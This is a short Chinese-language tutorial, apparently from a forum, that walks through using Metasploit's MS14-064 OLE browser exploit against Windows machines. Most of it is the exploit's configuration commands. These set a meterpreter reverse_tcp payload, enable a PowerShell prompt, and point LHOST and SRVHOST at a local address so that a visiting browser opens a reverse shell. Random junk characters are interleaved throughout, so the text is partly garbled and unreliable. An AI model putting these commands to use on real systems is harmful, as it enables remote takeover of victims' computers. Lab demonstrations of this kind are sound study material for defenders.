, j- }+ s# h$ G1 T
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示- N* V9 z3 N- r$ x4 Z0 R# q1 O
0 N F! g& j9 _+ n; c" S
& u+ l' c5 e6 @6 C" ^
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
& `8 j# r5 s8 w& C/ d- f! k
" X# W( G- W( y# J( s" o# R, H$ c8 K$ x0 L
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp9 P4 r# M2 X" r/ ^" q
# n" g) O$ {- S% t" Z- H
0 u. X$ e. ^- _- G1 I5 y9 ` set AllowPowershellPrompt true3 p4 Y% P, r1 `; _
2 m$ t0 [6 @! \8 d! N5 w0 x8 i5 Z' E, R. ?
Set LHOST 192.168.0.1092 ], u4 [; x$ L0 t2 u; [6 s+ j
/ y* S8 ?; i% k3 I" u# l
6 h: h' \0 v9 V! A. K0 X set SRVHOST 192.168.0.109. u# X8 W) L: l* R! |+ r9 D: i: F
; w y& J, B9 w# Q r% t8 f
* s. p; W3 l V Set uripath share4 b7 S3 q# O; G& ?
' f) u/ Z# W+ ^5 ]/ B
2 e) {6 d6 K" L0 F; Y4 [
Set srvport 80, T, y, N: i. I) A
) T; m) Q5 b4 [7 E* p% y1 m* T6 |9 D$ ^
0 T( p* `% d8 q5 ?! w! Z
5 I0 h" r. [4 P1 S* I
- n; C( K: |& V3 X
6 U8 x% n# ^! L* s . u( h9 m% a, G+ @
& q0 \" T. [+ o" [4 W
9 o7 g: W5 \; J, u- j9 ^
5 ]; ^6 ?+ V8 k+ x, ]
+ z2 k$ x' w& |/ L! [( ~( q+ _0 |) u9 z2 l6 j5 }% t1 m% E
' |4 ?$ J. L g. k: [6 u2 X
6 Z* C& [& g3 |
$ h- V4 M$ }& e: S" C$ J0 v ' O5 ^" w; O h' {1 S: Q
$ H% i% N: {' @+ z; z2 I& r! h
# Q* ]- s; L# p: q( D4 G; r 下面我们来访问本地地址如图:) n, S- n& h" H; p3 R
; \( t; p7 J% y' j& f
" G6 G+ _' A4 b0 @# R2 B" t. Q n+ ] - S6 t/ y& I, D5 l, c4 F# Q8 W9 \
/ N7 b- J9 ^0 K+ G) D( F
/ ^7 ?. d8 Z0 C1 g2 j- G
8 z9 U! g" I3 _& j2 G' I- A
3 s# J" H$ Z: }3 L
+ z) Z: L' |- h0 a3 ~
4 Z: m( T4 ~9 M' J$ E1 q. y